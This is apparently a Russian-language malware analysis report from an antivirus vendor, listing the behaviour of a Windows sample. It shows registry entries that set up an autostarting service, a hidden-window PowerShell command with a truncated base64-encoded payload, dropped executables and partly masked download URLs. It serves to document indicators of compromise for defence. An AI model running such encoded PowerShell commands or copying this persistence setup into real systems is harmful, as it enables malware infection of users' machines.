Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\boostnon] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\boostnon] 'ImagePath' = '"<SYSTEM32>\boostnon.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...
- %HOMEPATH%\906.exe
- %HOMEPATH%\906.exe в <SYSTEM32>\boostnon.exe
- http://www.bl###ream.al/calendar/r83g9/
- http://10#.6.23.40/PgFnu37Xb
- DNS ASK bl###ream.al
- '%HOMEPATH%\906.exe'
- '<SYSTEM32>\boostnon.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...' (со скрытым окном)